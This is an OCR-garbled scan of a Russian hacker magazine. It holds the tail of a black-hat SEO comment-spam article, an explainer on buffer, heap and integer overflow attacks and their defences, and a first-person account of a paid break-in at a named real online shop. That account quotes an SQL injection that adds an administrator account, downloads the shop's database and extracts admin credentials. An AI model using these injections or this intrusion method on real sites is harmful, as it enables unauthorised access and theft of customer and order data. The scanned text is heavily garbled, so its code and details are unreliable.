С55 (вроде <іприѣ зіуіе- "дізріау : попе "/>]. Тогда 
для спамилки оноточно будет выглядеть обычным полем и 
наиболее лакомой мишенью :). 

3. С помощью тех же сбб добавить в форму много лишних 
полей, которые не сможетувидеть пользователь. Некоторые 
спамилки пытаются вычислить, какую форму из присутству- 
ющих на странице нужно заполнять, следующим образом: 
если полей мало — это, скорее всего, какая-либо поисковая 
форма, если же полей слишком много, то это может быть 
форма добавления комментария или создания профайла. 

4. Реализовать написание комментариев с помощью крутей- 
шего аіах, чтобы никакая спамилка не могла пробиться сквозь 
дебри навороченныхжабаскриптов :). 

0 ЗЛОКЛЮЧЕНИЕ 

Подведем небольшой итог. В рамках статьи я попытался 
научить тебя продвигать свои проекты черными методами 
поисковой оптимизации. Я надеюсь, что ты будешь исполь- 
зовать ихтолько во благо (и не на моих ресурсах :)). Глядя на 
последние достижения в деле защиты отспама, ты можешь 
усомниться в надежности черной веб-рекламы. Если это 
занятие тебе не по силам, то советую оставить его и заняться 
сабмитом своих ссылок в социальных сетях и на сервисах 
закладокІогсІиттіеБ :]. И помни: без навыков программиро- 
вания натомже рбрты вряд ли добьешься успеха на данном 
поприще! Так что бегом учить матчасть! цс 
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• ѵѵѵѵѵѵ. 

ѵѵеЫодапаІугег. 

ЬІ 2 — хоумпага 
АИБиЬтіІІег’а 

• ѵѵогсіргеББ.огд 

— хоумпага знаме- 
нитого вордпресса 

• еп.ѵѵікіресііа. 
огд/ѵѵі кі/Т гаскЬаск 

— описаниетехно- 
логии ІгаскЬаск 




> ѵѵагпіпд 

Нежелательная 
рекламная рассылка 
незаконна! Инфор- 
мация, изложенная в 
статье, предоставлена 
исключительно как ру- 
ководство для борьбы 
со спамом. 
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НАВЕДЕНИЕ 
ПОРЯДКА 
В ХАОСЕ АТАК 



НОУ-ХАУ В ОШИБКАХ ПЕРЕПОЛНЕНИЯ 




Дыра — это нора, а в норе — ароматный ужин, как правило, состряпанный 
из переполняющихся буферов. От обилия материалов по этой теме рябит в 
глазах, и без систематического руководства новичку очень легко свернуть 
голову, соблазнившись статьей трехлетней давности. Методики атак на 
ошибки переполнения — весьма скоропортящийся продукт. Вот я и приго- 
товил свежачок! Приятного аппетита! 



оличество типов локальных/удаленных атак, прямо или 
косвенно связанных с ошибками переполнения, неуклонно 
растет. Защитные механизмы также не стоят на месте, но 
откровенно запаздывают. На передовой линии хакерского 
фронта царит полный хаос, совершенно не поддающийся никакой класси- 
фикации. Дыры (с чисто формальной точки зрения] делятся на семейства, 
типы и подтипы, но при внимательном анализе выявляются подтипы из 
различных семейств, описывающие одну и туже дыру, и классификация 
летит к черту! 



Тем не менее, без систематизации не обойтись. Невозможно каждый раз 
описывать все характеристики дыры от начала и до конца. Я не предлагаю 
своей собственной классификации и не придумываю новыхтерминов, а 
упорядочиваю уже существующие. Иногда (в силу сложившихся историчес- 
ких обстоятельств) — достаточно нелепые, но ставшие общепринятыми. 

В ПЕРЕПОЛНЯЮЩИЕСЯ БУФЕРА 

Возможность использования ошибок переполнения для хакерских атак 
была осознана итеоретически обоснована еще в 1972 году Джеймсом 
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Андерсеном ратез Апбегзоп), а спустя десятоклет, 2 ноября 1988, впервые 
опробована в достопочтенном Черве Морриса, использовавшем ошибку 
переполнения в ИКНХ-демоне Лпдег. После сокрушительной эпидемии на 
хакерском фронте наступило неожиданное затишье, но с конца 90х годов XX 
века атаки на переполняющиеся буфера вспыхнули с новой силой, да так 
вспыхнули, что едва не погрузили мир в средневековую тьму — хорошо, что 
ни один из червей не содержал в себе деструктивной начинки. 

Какова же природа сатаны, с которым приходится иметь дело? Она такова: 
локальные буфера находятся в стеке и при их переполнении (традиционное 
отсутствие проверки длины перед копированием!) происходитзатирание 
адреса возврата из функции (вместе с остальными буферами, скалярны- 
ми переменными и указателями, встретившимися на пути). Еслитолько 
функция не грохнется еще до своего завершения, то произойдет передача 
управления по адресу, записанному поверх адреса возврата. Произойдет 
в зависимости от«настроения» хакера, отправляющего процессор в 
«космос» (по случайному адресу) либо вызывающего зЬеІІ-код, который по 
обыкновению расположен непосредственно в переполняющемся буфере 
(в исключительных случаях — где-то в другом месте). Техника передачи 
управления кратко описана в одноименной врезке. 

Динамические буфера размещаются в куче (Ьеар). Сезон ее переполнения 
открылся статьей «Оп се ироп а Игее () », опубликованной 8 января 2001 
года неизвестным хакером в #39 номере электронного журнала рбгаск. 
Кстати, со ссылкой на исследовательскую работу Зоіаг’а Оезідпег’а, 
восходящую к 25 июля 2000 года и описывающую уязвимость библиотеки 
дІіЬс-2.2.3. Последняя допускает передачу управления на произвольный 
код или модификацию произвольных ячеек памяти (например, указате- 
лей на функции), что открывает поистине безграничные возможности для 
атакующего. 

Помимо стека и кучи, еще имеется и секция данных, где располагаются 
статические буфера, а также большое количество указателей на функции 
(особенно в Си++ программах с их таблицами виртуальных функций). Одна- 
ко атаки данного типа большого распространения так и не получили. 

г ХРОНОЛОГИЯ ТЕХНОЛОГИЙ защиты стека 



увеличивает размеры программы итормозитее выполнение, ктомуже, 
ошибку переполнения надо как-то обрабатывать, иначе компилятор просто 
вызовет функцию аварийного завершения программы. 

Даже сегодня, когда процессоры летают со скоростью пули, подавляющее 
большинство программ компилируются с отключенным контролем границ 
буферов. Впрочем, некоторые языки программирования (и, в первую 
очередь, Си/Си++) никакие проверки не спасают, поскольку полноценной 
поддержки массивов в них нет, и программистам приходится оперировать 
указателями на безразмерные блоки памяти. Как следствие — ошибки 
переполнения носят характер фундаментальной проблемы, не имеющей 
общего решения. 

Разработчикам компиляторов приходится извращаться и ходить другой 
тропой. Некогда популярное расширение для компилятора 6СС (уже давно 
интегрированное в него) со скромным названием 5іаск-6иагсІ модифи- 
цирует стековый фрейм путем помещения специального «сторожевого» 
слова перед адресом возврата (сначала представляющего собой константу, 
а затем — случайно генерируемое значение). В код эпилога добавляет- 
ся проверка целостности сторожевого слова на предмет его затирания 
хакером. Аналогичная техника используется и в последних компиляторах 
от М іеговой — тех, что поддерживают ключ /65, форсирующий проверку 
целостности адреса возврата. 

Недостаток подобных защит в том, что они защищают лишь сам адрес воз- 
врата, но не препятствуютзатиранию предшествующих ему переменных. 

А среди тех часто встречаются указатели на функции, позволяющие хакеру 
передавать управление по любому адресу, которому ему только вздума- 
ется. Последние версии 6СС поддерживают множество дополнительных 
расширений, «оборачивающих» буфера страницами памяти с атрибутами 
Ы0_АССЕ35 (всякая попытка доступа к ним вызывает исключение), а также 
шифрующихуказатели, которые хранятся в памяти, случайно сгенериро- 
ванной константой поХОН. Накладные расходы на защиту (оверхих), конеч- 
но, существенно возрастают, ан, вместе с тем, затрудняется и сама атака. К 
счастью (для хакеров), подавляющее большинство программ поставляются 
в незащищенном виде. 



Еще в древних компиляторах, написанных в эпоху М5-005, была предус- 
мотрена опция, отвечающая за контроль границ буферов, а в х86-про- 
цессоры встроена команда ВОПЫй, генерирующая исключение в случае 
выхода за границы буфера, но все эти технологии по разным причинам 
остались невостребованными. Первое (и главное) — среднестатистический 
программистне осведомлен обугрозе переполнения, а проверка границ 



г ХРОНОЛОГИЯ ЗАЩИТЫ КУЧИ 

Борьба с переполнением динамических буферов осложняется иерархи- 
ческим обустройством кучи. На самом нижнем уровне находится базовый 
аллокатор, встроенный в операционную систему. Прикладные программы 
обращаются к нему редко, предпочитая действовать через библиотечные 
вызовы конкретного компилятора, оптимизированные под выделение 




Современные х86 и х86-64 процессоры поддерживают атрибут, «исполняемый» на уровне отдельных страниц 
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Рго-роіісе — расширение для 6СС, защищающее адрес возврата специ- 




небольших блоков памяти. Защита кучи операционной системы без защиты 
библиотек всех популярных компиляторов (как правило, п рил инкованных 
статическим образом, то есть требующих перекомпиляции уже существую- 
щих программ) ничего не дает. А вот обратное утверждение неверно, хотя, 
если в программе используются прямые вызовы базового аллокатора, а 
он не защищен — то это ласты (кому ласты, а кому — радость от очередной 
удачно свершившейся атаки). 

Разработчики всех операционных систем: ВБй, 1_іпих, ѴѴіпсІоѵѵз прилагают 
нехилые усилия по защите базового аллокатора и воздвигают многоуров- 
невую линию обороны, призванную обеспечить контроль целостности кучи и 
не допустить затирания служебных структур данных. МісгозоЯ: отчаянно про- 
пагандируетзащиту кучи в Висте (впрочем, уже давно поломанную), забыв 
отом, что это никакие препятствует атакам. А проверка целостности кучи 
на уровне ВТБ конкретных компиляторов ни в ОЕБРНІ, ни в МБ ѴС, ни даже 
в последних версиях С# должным образом так и не реализована, и все это 
хозяйство (неважно — работающее под\/Ѵ2К, ХР или Вистой) атакуется влет. 
Библиотека І_ІВС (стандартная библиотека в мире Біпих/ВБО) и 6І_ІВС 
(стандартная библиотека компилятора 6СС) защищена намного сильнее, 
но хакеров особенно высаживаетто, что в различных версиях этих биб- 
лиотек применяются различные аллокаторы. А без точного знания схемы 
размещения служебных структур кучи ее не атакуешь — в лучшем случае 
получится отказ в обслуживании. Написаниеуниверсальных ехріоіі'ов 
затруднено и для удачной атаки необходимо знать точную версию библио- 
теки, используемую жертвой. Определить ее удаленно не так-то просто! 



г ХРОНОЛОГИЯ НЕИСПОЛНЯЕМОГО стека/кучи 

Запретна исполнение кода в стеке/куч е/сегменте данных когда-то казался 
весьма радикальным решением проблемы, гарантирующим мир и спо- 
койствие. А все потому, что руководящие работники не привыкли думать 
головой. Ни своей, ни чужой. 

Неисполняемый стек/ куча впервые появился в БІЫІХ-системах, причем 
довольно давно. Для достижения аналогичного результата парням из 
МісгозоТС понадобилась специальная аппаратная поддержка со сторо- 
ны процессоров, которая была предоставлена с большим запозданием. 
Проблема (если это можно назвать проблемой) втом, что И N IX (равно как и 
ѴѴіпсІоѵѵз) поддерживает линейное адресное пространство, выделяющее в 
распоряжение каждого процесса 4 Гб виртуальной памяти. В них размеща- 
ются: код операционной системы, код программы (со всеми динамически- 
ми библиотеками, секция данных, стек и куча. 

х86-процессоры поддерживают раздельные селекторы для кода, данных 
и стека — каждый со своими атрибутами, разрешающими (или не раз- 
решающими) чтение, запись и исполнение, однако дляупрощения кода 
операционной системы разработчики ѴѴіпсІоѵѵз «распахнули» селекторы 
кода/стека/данных на все адресное пространство, присвоив им идентич- 
ные лимиты и атрибуты защиты. Также поступили и разработчики первых 
версий Біпих/ВБО. 

На уровне отдельных страницх86-процессоры поддержи в а ют то ль ко два 
атрибута защиты: доступа и записи, при этом понятие «доступа» включает в 
себя как чтение, так и исполнение. Вплоть до недавнего времени атрибуты 
чтения и исполнения были тождественны друг другу. 
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Защита стека и кучи отисполнения, реализованная на древних х86-процес-;- 
сорах (поддерживают атрибут, «исполняемый»только на уровне селекто-. 
ров) 



Первыми спохватились разработчики Біпих/ВБй. Они «разнесли» стек/кучу 
и код по разным концам адресного пространства, скорректировали лимиты 
селекторов, в результате чего стек/ куча оказались совершенно неисполня- 
емыми. Хакеры конкретно приуныли. Но и ряду честных программ (напри- 
мер, компиляторам, транслирующим код в оперативную память) пришлось 
либо нехило извратиться, чтобы преодолеть прелести нововведений, либо 
объявить забастовку, какбольшинство из них и поступило. 

Так что поддержка атрибута на уровне отдельных страниц в последних 
версиях х86-процессоров пришлась ко двору не толь ко ѴѴіпсІоѵѵз, но и 
Біпих/ВБО. Но не успели разработчики опохмелиться после сдачи «защи- 
щенного» релиза, какхакеры уже изобрели атаку, получившую название 
геІигп21іЬс. В общих чертах, она сводится к засылке в стек указателей на 
функции, выделяющие блок памяти сатрибутами на запись + исполнение 
итутже копирующие в него зЬеІІ-код (с передачей на него управления 
классическим способом). При этом в стеке оказывался не код, а данные 

— указатели на функции, замещающие оригинальный адрес возврата. И 
хотя в ѴѴіпсІоѵѵз нетбиблиотеки ЫВС, зато там есть КЕВЫЕБ32.0ББ и потому 
атака ге{игп21іЬс работает на ура даже с неисполняемым стеком. 

Как водится, первыми отреагировали разработчики Біпих/ВБО (толи пьют 
они меньше, то ли трезвеют быстрее). Пакет РаХ (кстати говоря, портиро- 
ванный и под ѴѴіпсІоѵѵз) выполняет рандомизацию адресного пространства 
(Асісігезз Брасе БауосТ Рапсіотігабоп или, сокращенно, А5БР), размещая 
стек, кучу и системные библиотеки по случайным адресам. В итоге, хакер 
уже не может просто та к за сунуть в стек указатели на необходимые ему 
функции, ведь их местоположение заранее неизвестно! 

Разработчики Ореп-ВБО поступили иначе, внедрив технологию \А/ Л Х (что 
расшифровывается как«ѴѴХОРХ»), препятствующую одновременной 
установке атрибутов записи и исполнения, что существенно затрудняет 
атаку. По совести сказать, РаХ — круче. Поэтому спустя некоторое время 
коллектив Ореп-ВБй дал ему добро, предоставив пользователю выбор: 
какую защитную систему использовать. А5БР, реализованный долж- 
ным образом, действительно, представляет серьезное препятствие для 
атакующих, однако, даже в Біпих/ВБО часть критических структур данных 
по-прежнему располагается по вполне предсказуемым адресам. Что же 
касается ѴѴіпсІоѵѵз, то АББРтам поддерживается только, начиная с Висты, 
и реализован настолько криво, насколько это возможно. К тому же, ранее 
написанные программы с убитой таблицей перемещаемыхэлементов 
всегда загружаются по одному и тому же базовому адресу и в принципе 
не поддаются рандомизации. Такчто, для защиты от атак мало установить 
Висту на свой компьютер. Как минимум, требуется перекомпилировать все 
используемое программное обеспечение, а как его откомпилируешь, когда 
исходных текстов нет? 

Старые среды разработки ОЕБРНІ, Ѵізиаі Вазіс вообще не поддерживают 
возможность установки бита рандомизации и — помимо перекомпиляции 

— над сгенерированными файлами/динамическими библиотеками еще 
предстоит поработать руками (и головой) или же полностью переписать 
проектна С#. Заманчивая перспектива, не правда ли? Так стоит ли удив- 
ляться, что существенного снижения хакерской активности ожидать не 
приходится, во всяком случае на ближайшие года два, а там... хакеры снова 
что-то придумают. 



► 052 
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Реализация атаки геІигп21ІЬс, пришедшей из мира II N IX, на ѴѴІ псіоѵѵ5-сис-| 
темах с неисполняемым стеком 



Состояние стека до переполнения локального буфера 



ным и переменная 1 ел благополучно «докатится» до фун кци и тетсру. Там 
небольшое отрицательное знаковое число превратится в очень большое 
положительное беззнаковое (ШТ_МШ = 80000000Ь) . Именно столько 
байт памяти будетскопировано функцией тетсру. Точнее, она попыта- 
ется их скопировать, но поскольку вОООООООЪ. — это половина адресного 
пространства, выделенная процессу, из которой ему реально доступно еще 
меньше, дело закончится исключением типа «нарушение доступа», и хакер 
получит«всего лишь» отказ в обслуживании. 

А вот еще один пример вполне типичного кода: 

Ъаг ( іпі Іеп, сііаг *з) 

{ 

сііаг *р ; 

р = (сііаг *) шаііос (1еп+1) ; 

* ( ( (сііаг* )шешссру (р, з , 0 , Іеп))) = 0; 

геСшгп 1 ; 



В ЦЕЛОЧИСЛЕННОЕ ПЕРЕПОЛНЕНИЕ 

В большинстве языков программирования (и в языке Си, втом числе) 
значение выражения (п + к) для целочисленныхтипов в общем случае 
неопределенно — оно можетбыть равно арифметической сумме п и к... а 
может и не быть! 

При сложении двух беззнаковыхтипов х86-процессоры дают корректный 
результат лишь до тех пор, пока конечная сумма остается в пределах раз- 
рядной сетки. В противном случае процессор выставляетзнак переноса, и 
мы имеем «заворот», то есть ІІСНАК_МАХ + ЦСНАК_МАХ == ЦСНАК_МАХ-1 
== ЕЕІі. Аналогичным образом дела обстоят и с ЦШТ_МАХ. 
Авотсознаковымитипами все гораздо интереснее. В х86-процессорах 
старший бит числа используется для задания знака (в некоторых процес- 
сорах за это отвечает младший бит, но разговор не о них). На 32-разрядных 
платформах ШТ_МАХ = 2147483647, но (ШТ_МАХ+1) == ШТ_МШ == 
-2147483648. Получается, от наибольшего положительного до наимень- 
шего отрицательного — один шаг! Ни процессор, ни компилятор никак не 
реагируют на эту ситуацию и, если программист не озаботился рукотворны- 
ми проверками, программа может выдать весьма неожиданный результат. 
Но дальше — еще интереснее. По умолчанию іпѣ представляет собой 
зідпед. іпЪ — знаковый тип, а вот функция шаііос, выделяющая память, 
в качестве аргумента, задающего размер блока, принимаетзіге_&, 
определенный в заголовочных файлах как ипзідпесі іпѣ (как и множество 
функций подобного типа, включая тетсру). 

Посмотрим, к чему приводит такое несоответствие. Возьмем следующий 
(кстати говоря, широко распространенный) код: 

боо(іп1 Іеп, сііаг *р) 

{ 

сііаг Ъиб [МАХ_ЗІ2Е] ; 

ІТ (Іеп > МАХ_5І2Е) геДигп -1; 
тетсру (Ьиі, р, Іеп); 

геДигп 1; 

} 

Что произойдет, если в качестве Іеп передать отрицательное число? Пос- 
колькулюбое отрицательное число больше всякого положительного (очень 
умную мысль сказал, да?), то выражение ( Іеп > МАХ_ЗІЕЕ ) окажется лож- 



} 

Программист, копирующий строку, выделяет на один байт больше, куда и 
ставитзавершающий нуль (на тот случай, если *з окажется без такового). 
На первый взгляд, все ОК. Но если в качестве Іеп передать ІІІЫТ_МАХ, то 
при добавлении кнему единицы функциятаііос в качестве аргумента 
получит нуль! По стандарту попытка выделения блока нулевого размера 
является вполне допустимой операцией и функция тэііос обязана воз- 
вратить валидный указатель. Технически создать блок нулевого размера 
в памяти невозможно, поэтому обычно выделяется блок минимально 
возможного размера, который только поддерживает данная реализация 
шаііос (что-то около 1 6 байт). А вот дальше! Дальше функция тетсру 
попытается скопировать туда ІІІЫТ_МАХѣа\/\т [РЕЕЕЕЕЕЕЪ] , что опять-таки 
приведетк нарушению доступа. 

А что насчет захвата управления? Даже в примерах, рассмотренных 
выше, он вполне возможен, поскольку, прежде чем «врезаться» в не- 
выделенный регион памяти или область памяти, принадлежащую опе- 
рационной системе (и, естественно, защищенную от записи), функция 
тетсру имеетхорошие шансы перезаписать обработчики структурных 
исключений (как правило, хранящиеся в стеке). Тогда при генерации 
исключения вместо отказа в обслуживании управление подхватит 
хакерский код! 

В І_іпих/В50 никакого ЗЕН’а нет (там для этого используются сигналы, 
реализованные совсем иначе и неподвластные атаке). В ѴѴіпсІоѵѵз, начиная 
сХР, предпринята попытка защиты 5ЕН-обработчиков отхакерских домо- 
гательств и развернута компания под названием За^еЗЕН. Вышел Зегѵег 
2003, Виста, 5егѵег2008, а За^еЗЕН все еще улучшается иулучшается, нотак 
до ума и не доведена! 

Если же с целочисленными переменными осуществляются махинации 
в стил е тетсру ( йзЬ , зге, х*у+г) , что вовсе не редкость, то у хакера 
появляется реальная возможность получить в результате переполнения 
именното число, которое ему нужно. То есть, превышающее размер 
выделенного буфера, но не такое большое, чтобы «вылететь» за пределы 
адресного пространства. 

В принципе, некоторые компиляторы (например, 6СС) поддерживают 
специальный ключ, форсирующий проверку на целочисленные пере- 
полнения. Но, во-первых, она довольно сильно тормозит (и в случае 
переполнения опять-таки высаживает на отказ в обслуживании), а 
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во-вторых, от кастинга (явного/неявного преобразования типов) она не 
спасает. Приведенный пример, сточки зрения компилятора — впол- 
не законное программистскоетворение, а потому атаки данного типа 
прекращаться не собираются (ктому же, лишь немногие программисты 
способны провести надлежащий аудит кода на предмет поиска багов). 

^ ЗАНАВЕС 

Разумеется, разновидности атак на этом не заканчиваются и за кадром 
осталисьудары по памяти, использование освобожденных буферов, не- 
инициализированные локальные переменные и указатели, неспецифи- 
ческие разрушения памяти, ошибки синхронизации потоков... — малая 
часть того, что можно использовать для атаки с захватом управления 
или отказом в обслуживании. В рубрике «Обзор эксплойтов» я планирую 
планомерно и систематично окучить эту плодородную тему, детально 
описывая детали технической реализации в разделе би II сПзсІове. цс 



Передача 
управления 
на $1іе11-код 

Казалось бы, если атакующий может перезаписывать адрес 
возврата (или любой другой указатель на функцию), то проблема 
передачи управления на зЬеІІ-код решается сама собой, но все не 
так просто! Допустим, переполняющийся буфер расположен в 
стеке, а стек, как известно, растет снизу вверх (или сверху вниз 
— это уж кому как привычнее) и точное положение указателя 
вершины стека неизвестно. Следовательно, неизвестна и лока- 
ция зЬеІІ-кода. Так куда же передавать управление? 

Одно из решений проблемы (известное под именем N0? 8ІЛФ 
техники) заключается в дописывании в конец буфера большого 
количества незначащих инструкций N0?. Нах86-процессорах 
им соответствует опкод 90й, тождественный операции ХСНС 
ЕАХ,ЕАХ — обмену содержимого регистра ЕАХ с регистром ЕАХ, 




в конце которых стоит команда относительного (геіагіѵе) перехода 
на начало зііеіі-кода. Она не требует знания абсолютных адресов 
(неизвестных атакующему) . 

ІМОР’ы при этом оказываются расположены как до адреса возврата, 
таки после. Естественно, если управление будет передано «вперед», 
то цепочка управления, докатившись до адреса возврата, попытается 
интерпретировать его как машинную команду со всеми вытекаю- 
щими отсюда последствиями типа непредсказуемого поведения. 
Поэтому перед адресом возврата вставляется еще одна команда 
относительного перехода. 

Для реализации Ж)Р ЗІЛЮ-техники хакеру должен быть известен 
хотя бы приблизительный адрес буфера с зЬеІІ-кодом, а известен он 
далеко не всегда. Что ж, приходится прибегать к другой технике, ко- 
торая передает управление на вершину стека через команду ЛѴІР Е8Р, 
в х86-процессорах представляющую собой двухбайтовую машинную 
инструкцию с опкодом ЕРЬ Е4Ь. Вся хитрость в том, чтобы найти та- 
кую последовательность байт в памяти и подсунуть ее адрес на место 
адреса возврата из функции. Тогда, в момент стягивания последнего 
со стека, регистр Е5Р будет смотреть на двойное слово, следующее за 
адресом возврата, где может быть либо сам зЬеІІ-код, либо команда 
перехода к нему. 

Если целевая операционная система (или атакуемое приложение) из- 
вестна с точностью до версии — найти двухбайтовую последователь- 
ность не проблема. Не обязательно искать именно ЛѴТР Е8Р — ЕРЬ 
Е4Ь вполне может быть и частью совсем другой команды, например, 
инструкции САІХ БЪ^Ргші: с опкодом Е8Ь РРй Е4й РЕЕ РРй 56Ь. На 
машинах с неисполняемым стеком/кучей последовательность ЕРЬ 
Е4Ь необходимо искать только в кодовых секциях динамических 
библиотек или исполняемом файле атакуемого приложения. Если же 
защиты нет (или она отключена), подойдет и область данных. 

На системах с поддержкой А8ІЛ техника не работает, поскольку 
невозможно заранее определить адрес искомой последовательнос- 
ти. Между тем, если атакуемый исполняемый файл не содержит 
перемещаемых элементов (а чаще всего так и бывает) или одна из 
его динамических библиотек имеет сброшенный бит рандомизации 
(состояние по умолчанию), шансы на успешную атаку многократно 
возрастают! 
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МУЛЫИВЗЛОМ ЗАРУБЕЖНЫХ ШОПОВ 



Проводить успешные атаки на крупные сайты становится все сложнее. 
Причина банальна: их владельцы стараются вовремя апдейтить софт, 
не оставляя хакерам никаких шансов. Так есть ли смысл долбиться головой 
о стену, пытаясь в очередной раз раскрутить полуживой баг в популярном 
интернет-магазине? Или эффективнее собрать «с миру по нитке», сломав 
малоизвестный движок, а затем опустошить десяток шопов, работающих 
на нем? Ответ на этот вопрос можно получить лишь на практике. Впрочем, 
обо всем по порядку. 



Б МАЛЕНЬКИЙ ЗАКАЗ 

Весна была всамом разгаре. Теплые дни располагали кежедневному 
круглосуточному распитию пива, и думать о работе категорически не хоте- 
лось. Вернувшись вечером домой с очередной гулянки, я обнаружил в асе 
сообщение от своего знакомого — предложение немного подзаработать. 
Прикинув незавидное финансовое положение, грядущее лето и приближа- 
ющуюся сессию, я таки переборол лень и отписал товарищу: «Ок. Жду». 
Ждать долго не пришлось. Уже через несколько минут меня ввели в курс 
дела. Суть заказа была такова: клиента интересовал зарубежный шоп, рас- 
полагающийся по адресу Ы1р://Ьой : тап5.со.2а . От меня требовалось предо- 
ставить БД заказов и, по возможности, онлайн-доступ к панели управления 
магазином. Что ж, задача обыденная, посемуза работуя принялся сразу, но 
без особого энтузиазма. 

Первым делом было решено пробить ресурсы, располагающиеся на том 
же сервере, что и интересующий меня шоп. Умерший ѵѵ\лл/ѵ.ботаіп5СІЬ.пеІ 
не сулил ничего хорошего, поэтому я зашел на ЬНрѴ/аіЬзОп.пате . В поле 
«Нозі: іпЛогтпаѣіоп : » вбилурл интернет-магазина, выбрал функцию 
«Кеѵегзе» и нажал <Еп1ег>. Результат предстал моему взору через пару 
секунд. Как оказалось, но сервере хостилось около сотни ресурсов, причем, 
подавляющее большинство доменов находилось в доменной зоне ЮАР 
— .га. Перебирать ресурсы вручную абсолютно не хотелось, а запускать 
сканер пока не имело смысла. Открыв в браузере новую вкладку, я зашел 
на ЬйрУ/Ьойтапз.со.га и начал изучать сайт. Шоп крутился на азр-движке 



под названием ѴР-АБР БЬорріпд Сагб Погуляв по гуглу, я откопал прошло- 
годний эксплойт на милворме [ ѵѵѵѵѵѵ.гпіІѵѵОгт.согп І — он был написан неким 
Іхасеѵѵаг’ом: 

Тке 3<2Ь Ігщесбіоп Ъид із іп бке збюрсиггепсу . азр бііе 
ипсіег бке "сісі" диегу. 

диіск каск бо асісі изег а/а: 

/зкорсиггепсу . азр?сісІ=АГО ' ; іпзегб іпбо бЫизег ("бісіизе 
гпаше" , " бісіраззѵгогсі" , " бісіассезз " ) ѵаіиез ('а'.'а','!^ 
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26,27,28,29' ) -- 

апсі бог бкозе об уои бкаб сіоп'б кпом зді аб аіі 
бМз із ком уои гешоѵе бЬе изег ' а ' : 

/зЬорсиггепсу . азр?сісІ=АШ ' ; сіеіебе бгош бЫизег ѵ?Ье ге 
б1сЗизегпаше= ' а ' - - 

Суть баги заключалась в простой зці-инъекции (в скрипте зЬорсиггепсу . 
азр), с помощью которой без труда можно было добавлять новых юзеров с 
правами администратора в БД. Для этого достаточно составить запрос вида: 
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іпзегк іпко кЫизег ( " кісіизегпате'' , " ПсЗраззтлГОгсІ" , " кісіа 
ссезз " ) ѵаіиез ( ' логин ' , ' пароль ' , '1,2,3,4,5,6,7,8,9,10 
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 
8,29') — 

Удал ить созда н но го юзера можно было с помощью следующего запроса: 

сіеіеке кгот кЫизег ѵгііеге Г1(1изегпате= ' логин ' 

Довольно улыбаясь, я вернулся к атакуемому шопу, составил зді-запрос и 
обновил страницу. Увы, меня ждал облом — скрипт зЬорсиггепсу . азр 
на сервере отсутствовал. Поразмыслив, я пришел к выводу, что имею дело 
с другой версией движка. Такого поворота я не ожидал, но сдаваться было 
еще рано. Прошерстив двиг вручную, я обнаружил пару 5СН_-инъектов. 
Первый — в скрипте поиска ЗЬорОізрІаургодисЬз . азр : 

МісгозоКОІ-Е БВ Ргоѵісіег *огООВСОпуег5еггог , 80040Е14' 

[Місгозоік] [ОБВС Місгозоік Ассезз Бгіѵег] Зупках 
еггог іп диегу ехргеззіоп ' ( ( спате Ыке ' %дЫід '%' ОК 
ссіезсгіркіоп Ыке ' %дЪЪ.і ' % ' ОН ссосіе Ыке ' %дЪЪ.і ' % ' ОК 
ткд Ыке ' %дЫіз ' % ' ) ) ' . 

Причем, значения параметров передавались Р05Т-методом. Второй инъ- 
ектбыло нетрудно заметить, перейдя по линку: 




4 . зЪора_ес1ікс1ізр1ау . азр?каЫе=тусотрапу — Ѵіем/Брсіаке 
Уош: Сотрапу Іпіогтакіоп 

5 . з!іора_есІікс1ізр1ау . азр?каЫе=сизкотегз — Ѵіе^/Брсіаке 
Сизкотегз 

6. зЬора_ейіксІізр1ау . азр?каЫе=Ргос[Ееакигез — Ѵіеѵ?/ 
Брсіаке Ргосіиск Реакигез 

7 . з!юра_есііксІізр1ау . азр?каЫе=зиЪсакедогіез — Ѵіеѵі/ 
Брсіаке ЗиЬсаРедогіез 

8 . з!юра_есііксІізр1ау . азр?каЫе=огсІегз — Ѵіеѵ7/ирс1аке 
ОгсЗегз 

9 . зТюра_диегу . азр — Асіѵапсесі Оиегу 

10 . зЬора_изег_сопкго1 . азр — АскЗ/БеІеРе Бзегз 

11 . зЬора_тепи_сопкго1 .азр — Мепиз Тог адтіпізкгакогз 




12 . зЬора_1одМзк . азр — Ѵіем Ьодіп Ызкогу 

13 . зЪора_есіікс1ізр1ау . азр?каЫе=з1ііртек]іосіз — Ѵіеѵ?/ 
Брсіаке ЗЬірріпд 

14 . зЪора_герогкз . азр — Заіез Керогкз Ьу Баке 

15 . зЪора_зкоск. азр — Зкоск Ьом Керогкз 

16 . зЪора_зеагс]ігерогк8 . азр — Бізріау зеагсЪ. кеумогйз 



17 . зЬора_аТТгероП:з . азр — Аккіііаке Верогкз 

18 . зкора_есІікс1ізр1ау . азр?каЫе=а:Еі:і1іакез — Ѵі еѵі/ 
Брсіаке Аккіііакез 



кккр: //коТТтапз . со. га/зкорсіізріаургосіискз . азрЗісІ^&зиЬ К счастью, у обоих админов никаких ограничений в правах не стояло, чем я 
сак=16%27&сак=ОкЬег+С]ііскеп+Рогкіопз и воспользовался :). Админка располагалась по адресу: 



Місгозоік ОБЕ БВ Ргоѵісіег Тог ОБВС Бгіѵегз еггог 
' 80040е14 ' 

[МісгозоТТ] [ОБВС МісгозоТТ Ассезз Бгіѵег] ЗупТах 
еггог іп зТгіпд іп диегу ехргеззіоп 'ссаТедогу = 7 АЫБ 
ЗиЪсакедогуІБ=16 ' Огсіег Ву зресіаІОТТег БЕЗС, спате' . 

Изтекста сообщения об ошибке стало понятно, что двиг используетМісгозоІі: 
Ассезз, а значит, с реализацией инъекта будут проблемы. В такой ситуации я ре- 
шил на время отложить обе баги и просканировать ресурс на наличие открытых 
для чтения директорий и доступных для скачивания файлов .тдЪ. Набросав 
небольшой файликс интересующими меня названиями каталогов/файлов, я 
запустил сканер судаленного сервера, а затем удалился восвояси. Вернувшись 
в Сеть через несколько часов, я обнаружил, что сканирование успешно завер- 
шено. Я проанализировал логи выбрал из него всего одну строчку: 

кккр : / /ЬоТТтапз . со . га/ зЬорріпд . тсЗЪ 

Вбив урл в адресной строке и перейдя по нему, я успешно слил увесистый 
файл и к зЪорріпд.тсІЪ, а затем принялся изучать его содержимое. Пре- 
жде всего, меня интересовала таблица іЫѴзег, в которой оказалось две 
полезные для меня записи: 

ЫсШзегЫате іІсІРаззтлюгсІ 

тіке змеек 

,12,13,14,15,16,17,18 
тікі змеек 

,12,13,14,15,16,17,18 

Как видно из БД, в шопе использовалось два админских аккаунта с одина- 
